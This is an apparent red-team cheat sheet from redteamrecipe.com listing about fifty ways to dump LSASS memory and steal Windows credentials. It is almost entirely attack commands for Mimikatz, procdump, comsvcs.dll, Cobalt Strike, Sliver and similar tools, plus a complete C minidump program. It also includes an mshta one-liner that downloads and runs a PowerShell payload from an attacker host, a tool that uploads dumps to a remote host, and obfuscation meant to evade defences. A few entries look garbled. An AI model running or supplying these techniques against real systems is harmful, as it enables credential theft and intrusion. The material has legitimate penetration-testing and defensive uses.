50 METHODS FOR DUMP LSASS

REDTEAMRECIPE.COM POWERED BY HADESS.IO


MIMIKATZ

Usage
sekurlsa::logonpasswords
sekurlsa::minidump
lsadump::dcsync


PROCDUMP

Usage
procdump -ma lsass.exe lsass.dmp
procdump -accepteula -64 -ma lsass.exe lsass.dmp


PROCESS HACKER

Usage
System->LSASS process->Create Dump


DUMPIT

Usage
tasklist /FI "IMAGENAME eq lsass.exe"
DumpIt.exe PID output_file_name.bin


WINDOWS DEBUGGING TOOLS

Usage
windbg -p <lsass process id>
.dump /ma c:\path\to\lsass.dmp
.detach
.q


FTK IMAGER

Usage
Create Disk Image
Physical Drive
Capture Memory
LSASS.exe


VOLATILITY

Usage
pstree
volatility -f memory_dump.raw --profile=Win7SP1x64 memdump -p <lsass_pid> -D <output_directory>


WINPMEM

Usage
winpmem.exe -o dump.raw


HIBERFIL.SYS

Usage
windbg.exe -y srv*c:\symbols*http://msdl.microsoft.com/download/symbols -i c:\symbols -z C:\hiberfil.sys
Yes
!process 0 0 lsass.exe
!process 0 0 lsass.exe; .dump /ma <output file path>


WINDOWS ERROR REPORTING

Usage
HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps -> DumpType -> 2
Lsass-Shtinkering.exe


LIVEKD

Usage
LiveKd.exe -w
!process 0 0 lsass.exe
.process /p [lsass PID]
.dump /ma [dump file path]


TASK MANAGER

Usage
Powershell -ep bypass
Get-Process lsass
C:\Windows\System32\Taskmgr.exe /dumpfile=C:\lsass.dmp /pid=<LSASS_PID>


COBALT STRIKE+SHARPDUMP

Usage
execute-assembly SharpDump
Or
load sharpdump
sharpdump


COBALT STRIKE+MIMIKATZ_COMMAND

Usage
Mimikatz_command
sekurlsa::minidump


COBALT STRIKE+TASKKILL

Usage
taskkill /f /im lsass.exe


COBALT STRIKE+SYSINTERNALS

Usage
load sysinternals
Procexp
"File" -> "Save"


COBALT STRIKE+SCHTASKS

Usage
cmd /c cmd /c Schtasks.exe /create /RU SYSTEM /SC Weekly /D SAT /TN Commands /TR \"''rundll32.exe'' C:\\windows\\system32\\comsvcs.dll MiniDump "+strPID+" C:\\Windows\\Tasks\\dump.bin full\" /ST 06:06:06 && Schtasks.exe /run /TN Commands && REM ' -Force;"


BRUTE RATEL C4+KIWI

Usage
load kiwi
lsa_dump_sam
lsa_dump_secrets


METASPLOIT+LSASSY

Usage
use post/windows/gather/credentials/lsassy
set SESSION <session ID>
Run or exploit


COVENANT+SHARPKATZ

Usage
Create Task->Module->SharpKatz
Arguments->lsa_dump


EMPIRE+WMIEXEC

Usage
Modules
credentials/mimikatz/lsass_dump
Execute or run
sekurlsa::minidump


SLIVER+LSASS_DUMP

Usage
use lsass_dump
Options
run


VILLAIN

Usage
villain.exe agent
villain.exe client -c <IP_ADDRESS>
villain.exe dump lsass


OCTOPUS

Usage
pupy.exe shell --cmd "python -m pupy.modules.pupywinutils.lsassdump -o C:\temp\lsass.dmp"


NIMPLANT

Usage
lsassdump


POSHC2+MINIDUMPWRITEDUMP

Usage
MiniDumpWriteDump
Get-LsassDumpProcDump


POSHC2+NTQUERYVIRTUALMEMORY

Usage
NtQueryVirtualMemory
Get-LsassDumpNtQueryVirtualMemory


POSHC2+BLOODHOUND

Usage
Get-LsassDumpBloodHound


MANJUSAKA

Usage
mshta.exe javascript:A=new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:<port>/r.ps1')",0);close();
Manjusaka lsass dump


DUMPERT

Usage
Dumpert.exe -k lsass.exe -s -o lsass.dmp


NANODUMP

Usage
NanoDump.exe -t [process ID] -o [output file path]


SPRAYKATZ

Usage
spraykatz.exe -w <domain> -u <username> -p <password> --krb5i --mimikatz "sekurlsa::minidump lsass.dmp" "exit"


HANDLEKATZ

Usage
HandleKatz.exe -p lsass.exe
HandleKatz.exe -p lsass.exe -o [handle ID] -dump


CALLBACKDUMP

Usage
CallbackDump.exe -d <dump_file_path> -p <process_id>


LSASSSILENTPROCESSEXIT

Usage
LsassSilentProcessExit.exe <PID of LSASS.exe> <DumpMode>


ANDREWSPECIAL

Usage
AndrewSpecial
andrew.dmp!


MASKY

Usage
.\Masky.exe /ca:'CA SERVER\CA NAME' (/template:User) (/currentUser) (/output:./output.txt) (/debug:./debug.txt)


SHARPMINIDUMP

Usage
SharpMiniDump.exe -p <lsass_process_id> -o lsass.dmp


MINIDUMP

Usage
MiniDump.exe /p <process_id> /o <output_file_name>


LSASSDUMPREFLECTIVEDLL

Usage
Import-Module .\ReflectiveLsassDump.dll
Invoke-ReflectivePEInjection -PEBytes (Get-Content ReflectiveLsassDump.dll -Encoding Byte) -ProcessID (Get-Process lsass).Id


MOONSOLS WINDOWS MEMORY TOOLKIT

Usage
MoonSolsWindowsMemoryToolkit.exe
Dumping->Launch DumpIt
LSASS->Select the process to dump


MINIDUMPWRITEDUMP

Usage
#include <windows.h>
#include <dbghelp.h>
#include <stdio.h>

#pragma comment(lib, "dbghelp.lib")

int main()
{
    // Open the target process with the access rights MiniDumpWriteDump requires
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, <lsass_process_id>);
    if (hProcess == NULL)
    {
        printf("Failed to open process: %lu\n", GetLastError());
        return 1;
    }

    WCHAR dumpFileName[MAX_PATH];
    swprintf(dumpFileName, MAX_PATH, L"lsass.dmp");

    // Create the file the minidump is written to (wide-char path, so CreateFileW)
    HANDLE hDumpFile = CreateFileW(dumpFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDumpFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed to create dump file: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return 1;
    }

    // Write a full-memory minidump of the opened process into the file
    BOOL success = MiniDumpWriteDump(hProcess, <lsass_process_id>, hDumpFile, MiniDumpWithFullMemory, NULL, NULL, NULL);
    if (!success)
    {
        printf("Failed to create minidump: %lu\n", GetLastError());
        CloseHandle(hDumpFile);
        CloseHandle(hProcess);
        return 1;
    }

    CloseHandle(hDumpFile);
    CloseHandle(hProcess);

    return 0;
}


COMSVCS.DLL

Usage
regsvr32 comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump lsass.exe lsass.dmp full


MIRRORDUMP

Usage
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824


DUMPY

Usage
dumpy.exe dump -k secretKey -u http://remotehost/upload force


RTOOLZ+PROCEXP152.SYS

Usage
.\procexp64.exe -accepteula /t
RToolZ -p <pid>


SHARPUNHOOKER+LSASSUNHOOKER

Usage
LsassUnhooker.exe -r <output_file_path>
SharpUnhooker.exe inject --process lsass.exe --modulepath ReflectiveDLL.dll
SharpUnhooker.exe dump --process lsass.exe --output lsass_dump.bin


HASHDUMP

Usage
Kldumper.exe
laZagne_x64.exe
PwDump7.exe
QuarksPwDump.exe
SqlDumper.exe
Wce_x64.exe
SAMInside.exe


MIMIKATZ+INVOKE-OBFUSCATION

Usage
Import-Module PowerSploit
Invoke-Mimikatz -DumpCreds
Invoke-Obfuscation -ScriptBlock { [System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\mimikatz.exe')) } -Command 'Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JABzAD0ATwB2AGkAZQBzAC4AQwBvAG0AbQBhAG4AQQB0AHIAZQBzAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAHIAZQBzAG8AXQAuAFQAcgBpAGMAeQBTAHQAcgBlAGEAbQAuAEEAcABwAG8AcgB0AGwAZQBOAGEAbQBlAFMAdABpAG4AZwBdACkAIAB8ACAACgAkAHMAdwB3AG8AcgBkACAAPQAgAFsAcwBdAC4AVwBpAG4AZABvAHcAbgBhAGwAaQB6AGUAXQAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdgBpAGQAZQBJAHQAKAAiAEMAaABhAG4AZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbQBwAHIAZQBzAGgAZQBuAGQAKQBdAC4AQQBzAHMAZQBtAGIAbABlAC4AVABvAHAAYwBvAG4AcwB0AHIAYQB0AGUAZAAoACcAKwAnACsAJwApAC4AUABhAGMAZQBuAHQAYQB0AGUAUwB0AGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB2AGkAZABlAEkAdAAoACcARQB4AGkAbgBzAGMAcgBpAHAAbwB3AGUAcgBzAGgAZQBuAGMAaABpAG8AbgBzAHQAcgBpAG4AZwAnACkAKQBdACkA")]))'


BETTERSAFETYKATZ

Usage
.\BetterSafetyKatz.exe
.\BetterSafetyKatz.exe '.\mimikatz_trunk.zip'
sekurlsa::minidump


REDTEAMRECIPE.COM
RedTeamRecipe is a platform designed for cybersecurity professionals who want to learn more
about red teaming and penetration testing. Red teaming is a practice where an organization
simulates a real-world cyber attack to identify vulnerabilities and improve their security
measures.

POWERED BY HADESS.IO
